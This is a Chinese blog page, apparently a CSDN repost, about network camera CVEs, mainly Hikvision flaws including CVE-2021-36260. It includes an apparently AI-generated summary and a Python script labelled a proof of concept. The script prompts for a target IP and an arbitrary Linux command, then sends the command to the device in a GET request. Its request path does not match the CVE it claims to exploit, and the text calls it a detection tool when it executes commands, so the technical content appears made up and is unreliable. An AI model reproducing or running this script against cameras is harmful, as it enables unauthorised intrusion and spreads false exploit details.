网络摄像头CVE

博客提及CVE-2018-9995,指出存在rtsp未授权访问问题,内容转载自https://www.cnblogs.com/AtesetEnginner/p/11038980.html 。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 CVE-2018-9995

rtsp未授权访问

 

转载于:https://www.cnblogs.com/AtesetEnginner/p/11038980.html

### 关于海康威视摄像头的安全漏洞 #### CVE-2017-7921 此漏洞涉及海康威视设备中的一个安全隐患,允许未经授权的访问者通过特定方式获取敏感数据或控制权限。该漏洞通常可以通过网络扫描工具(如FOFA)来识别目标设备并测试其是否存在已知漏洞[^1]。 #### CVE-2021-36260 这是一个更为严重的远程代码执行漏洞,存在于海康威视IP摄像机和NVR设备的固件中。由于输入参数校验不足,攻击者能够无需身份验证的情况下向受影响设备发送特制的数据包,从而触发远程命令执行行为。这一问题广泛影响多个版本的网络摄像头产品及其关联录像存储装置[^2]。 针对上述提到的CVE编号之一即`CVE-2021-36260`, 开发人员提供了相应的Python脚本作为概念证明(PoC),用于检测哪些系统可能受到威胁。有兴趣的研究员可以从指定链接下载相关文件进行学习研究[^3]: ```python import requests from urllib.parse import quote_plus def exploit(target_ip, command="id"): url = f"http://{target_ip}/system.ini?cmd={quote_plus(command)}" response = requests.get(url) if response.status_code == 200 and 'error' not in response.text.lower(): print(f"[+] Command executed successfully:\n{response.text}") else: print("[-] Failed to execute the provided command.") if __name__ == "__main__": target = input("[*] Enter Target IP Address: ") cmd = input("[*] Enter Your Desired Linux Command (default=id): ") or "id" try: exploit(target, cmd) except Exception as e: print(f"An error occurred during exploitation attempt: {e}") ``` 以上代码片段展示了如何构建URL字符串并通过GET请求尝试利用存在缺陷的服务接口达成任意指令运行的目的。请注意实际操作前需获得合法授权以免触犯法律条款。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值